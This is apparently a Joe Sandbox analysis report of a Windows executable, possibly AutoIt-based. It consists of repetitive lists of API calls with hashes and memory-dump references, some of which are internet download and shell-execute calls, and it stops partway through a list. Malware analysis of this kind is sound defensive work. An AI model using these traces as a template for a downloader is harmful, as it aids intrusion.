                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseExecuteHandleShell_wcscpy_wcslen
                                                                                  • String ID: <$@
                                                                                  • API String ID: 2417854910-1426351568
                                                                                  • Opcode ID: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                  • Instruction ID: b88a15a70aa0ad5f6f29005b2a8070d35214d1ef645994392ec84fe4d9ca6df0
                                                                                  • Opcode Fuzzy Hash: 456975d6943100b9bccf6a944bdff1bb50055e47ea808eda8884d41227499f4e
                                                                                  • Instruction Fuzzy Hash: C751D3719002089BDB10EFA1D985AAFB7B4EF44309F10446EED05AB352DB79ED49CB94
                                                                                  APIs
                                                                                  • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A87A
                                                                                  • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A8C9
                                                                                  • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0044A901
                                                                                    • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                  • String ID:
                                                                                  • API String ID: 3705125965-3916222277
                                                                                  • Opcode ID: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                  • Instruction ID: d28fa13b4dde737238ce5dcfaacd3c540a76458eeabd88e5a6b3f8614e5f537b
                                                                                  • Opcode Fuzzy Hash: 0ee13e9a60eb6ba6c748d714ed0ce9e8e081c7518857538375ec5b6ad63af0be
                                                                                  • Instruction Fuzzy Hash: DB310B76A802047AE720EF56DC42FDFB7A8EBD9710F00851FFA0097281D6B5550987AC
                                                                                  APIs
                                                                                  • GetMenuItemInfoW.USER32 ref: 0045FAC4
                                                                                  • DeleteMenu.USER32(?,?,00000000), ref: 0045FB15
                                                                                  • DeleteMenu.USER32(00000000,?,00000000), ref: 0045FB68
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Menu$Delete$InfoItem
                                                                                  • String ID: 0
                                                                                  • API String ID: 135850232-4108050209
                                                                                  • Opcode ID: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                  • Instruction ID: 2caf7e1b7ae413ca61a5456c92b2eab9e90ede26a48057f627e29f4096114103
                                                                                  • Opcode Fuzzy Hash: 44596b6c283006d3404d95c3e5e16104138b05286e513df4f299336d423ce3c8
                                                                                  • Instruction Fuzzy Hash: CC41D2B1604201ABD710CF25CC45F17B7A9AF84315F148A2EFDA49B2C2D378E849CBA6
                                                                                  APIs
                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 0045085F
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 0045087D
                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0045088E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Long
                                                                                  • String ID: SysTreeView32
                                                                                  • API String ID: 847901565-1698111956
                                                                                  • Opcode ID: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                  • Instruction ID: 2f6c96d6d770cdd7f6b01965cae739f5ffbb06f7b8c4bfc7c6bf121f6b9a1f40
                                                                                  • Opcode Fuzzy Hash: 6654344cdbbec2ecb5663208c63790126aca218b871aedcbee15bef271784643
                                                                                  • Instruction Fuzzy Hash: 34418D75500205ABEB10DF29DC84FEB33A8FB49325F20471AF865972D1D778E895CBA8
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00434B10
                                                                                  • GetProcAddress.KERNEL32(?,AU3_GetPluginDetails), ref: 00434B88
                                                                                  • FreeLibrary.KERNEL32(?), ref: 00434B9F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: Library$AddressFreeLoadProc
                                                                                  • String ID: AU3_GetPluginDetails
                                                                                  • API String ID: 145871493-4132174516
                                                                                  • Opcode ID: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                  • Instruction ID: fc8523f5daf935d660d2a9c884068eb8da3e2fc1adb06f3317e0194b47a185ca
                                                                                  • Opcode Fuzzy Hash: 525874d34911f66d3e6dd89a42f64d0fb8abb6a055dcd3ee386d4a3c405b38ac
                                                                                  • Instruction Fuzzy Hash: C24107B9600605EFC710DF59D8C0E9AF7A5FF89304B1082AAEA1A8B311D735FD52CB95
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00450DFD
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00450E16
                                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00450E3E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Window
                                                                                  • String ID: SysMonthCal32
                                                                                  • API String ID: 2326795674-1439706946
                                                                                  • Opcode ID: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                  • Instruction ID: 97bf4b40409f6c90460d1384a7672ac630dd7a2161d32aee0dcf483843136ede
                                                                                  • Opcode Fuzzy Hash: aa3fdffd2c37c9d1283d502314bb1f920e47acbbfa02c8d10baeab348a12d0cc
                                                                                  • Instruction Fuzzy Hash: A93195752002046BDB10DEA9DC85FEB73BDEB9C724F104619FA24A72C1D6B4FC558B64
                                                                                  APIs
                                                                                  • DestroyWindow.USER32(00000000), ref: 00450A2F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: DestroyWindow
                                                                                  • String ID: msctls_updown32
                                                                                  • API String ID: 3375834691-2298589950
                                                                                  • Opcode ID: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                  • Instruction ID: fccd3fcc05e4e2aaf5990a1cc96ccc3c6d01ef6560d5fec67e6c7c3c5f699695
                                                                                  • Opcode Fuzzy Hash: ede3ba3c4388c74c76a3cd747824982d62f6d25d37162a4df1ebcaa7ffb6df4e
                                                                                  • Instruction Fuzzy Hash: 213182767402056FE710DF58EC81FAB3368FF99710F10411AFA009B282C7B5AC96C7A8
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: _memmove
                                                                                  • String ID: $<
                                                                                  • API String ID: 4104443479-428540627
                                                                                  • Opcode ID: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                  • Instruction ID: e8c4ca86f7ae52158d8313b00b6d431508e51e3fea12eaab667d4a9530e7d8b8
                                                                                  • Opcode Fuzzy Hash: 6c7976b20de454da7fe1266d8cf8ce191b2ccd068f9cf911d6d19d23786630cd
                                                                                  • Instruction Fuzzy Hash: A331EF30D04258DEFF25CFAAC9847EEBBB1AF11310F18419AD455A7382D7789E48CB25
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                  • String ID: \VH
                                                                                  • API String ID: 1682464887-234962358
                                                                                  • Opcode ID: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                  • Instruction ID: 72795a51c8fd7a71edb0939b11d44c3a5eb04741920228a3d2c34b8a4a3992bf
                                                                                  • Opcode Fuzzy Hash: e9044521b94c7a2fd6e775d53faddef87f956e6addecf71534c1072a2e4d61eb
                                                                                  • Instruction Fuzzy Hash: B5217171D002089FCB00EFA5D98499EBBB8FF48314F1184AAE805AB351D7349E05CB64
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D79D
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D812
                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D85C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                  • String ID: \VH
                                                                                  • API String ID: 1682464887-234962358
                                                                                  • Opcode ID: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                  • Instruction ID: ae55674c87016058c86dc8d4ad6f5a536cd264dc70ae423c542bf2f5a0a67e7a
                                                                                  • Opcode Fuzzy Hash: 02922531bbe1fdf38ecd1c48401d7894eac39f8171a3426d51aa67f0eafe79b3
                                                                                  • Instruction Fuzzy Hash: C9316F75E002089FCB00EFA5D985A9DBBB4FF48314F1080AAE904AB351CB75EE05CB94
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D87B
                                                                                  • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?,?), ref: 0045D8F0
                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D93A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$DiskFreeSpace
                                                                                  • String ID: \VH
                                                                                  • API String ID: 1682464887-234962358
                                                                                  • Opcode ID: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                  • Instruction ID: e5212c229d9c2069cdfe567d9572a18bb695f81ecf44ad0a977260396f8f3e20
                                                                                  • Opcode Fuzzy Hash: 657bf3a7bf4e4b0879eb54f11f0d4a47d1274a72e537d3786cc0042974389a76
                                                                                  • Instruction Fuzzy Hash: E6316D75E002089FCB00EFA5D984A9EBBB4FF48314F1084AAE904AB351CB35DE05CB94
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D37E
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D3F4
                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D437
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                  • String ID: \VH
                                                                                  • API String ID: 2507767853-234962358
                                                                                  • Opcode ID: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                  • Instruction ID: 9072e4f9bd6fffdf4d5f5b526d3ef1379cf95bcdbb04681c41660468616ecd75
                                                                                  • Opcode Fuzzy Hash: 3e53e890434f9ea80ffb8b8b8863db28d9ef5c2317443d22617d365319ccab8e
                                                                                  • Instruction Fuzzy Hash: E5213075A002099FC714EF95CD85EAEB7B8FF88300F1084AAE905A73A1D774EA45CB54
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D55C
                                                                                  • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D5D2
                                                                                  • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D608
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ErrorMode$InformationVolume
                                                                                  • String ID: \VH
                                                                                  • API String ID: 2507767853-234962358
                                                                                  • Opcode ID: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                  • Instruction ID: 5d1496e5fec29648c5677f840c6a5ff7f703137340fc9510fe584f3610dc7e3a
                                                                                  • Opcode Fuzzy Hash: d1fa58eff2fbb7cc6c51b85e489fdb3630b63cb8eb333212ecdab13a3ad88969
                                                                                  • Instruction Fuzzy Hash: 88218271A00209AFC714EF95C885EAEB7B4FF48300F0084AEF505A72A1D774E905CB58
                                                                                  APIs
                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450B3B
                                                                                  • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450B51
                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450B5F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend
                                                                                  • String ID: msctls_trackbar32
                                                                                  • API String ID: 3850602802-1010561917
                                                                                  • Opcode ID: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                  • Instruction ID: cc80dcb7cd3031ad5716ab9229ca2671b5dcb2452333e47e40e099fef7a03d8b
                                                                                  • Opcode Fuzzy Hash: b7bd052b599063d2228b5cfe26d5df8f76e43bb35df486dd72efd91b953fbf0c
                                                                                  • Instruction Fuzzy Hash: 301196757403197BEB109EA8DC81FDB339CAB58B64F204216FA10A72C1D6B4FC5187A8
                                                                                  APIs
                                                                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                  • CLSIDFromString.OLE32(?,00000000), ref: 00435236
                                                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00435285
                                                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 004352B4
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226843422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226873671.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_400000_SP0npSA64a.jbxd
                                                                                  Similarity
                                                                                  • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                                                  • String ID: crts
                                                                                  • API String ID: 943502515-3724388283
                                                                                  • Opcode ID: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                  • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                                                  • Opcode Fuzzy Hash: 1c951fdfbdf5c5f88c618ab4611406fe4b678f9348836ee2954194ca176c3974
                                                                                  • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                                                  APIs
                                                                                  • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                                                  • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                                                  • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.2226748457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000000.00000002.2226735385.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226793264.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226808738.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                  • Associated: 00000000.00000002.2226821844.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
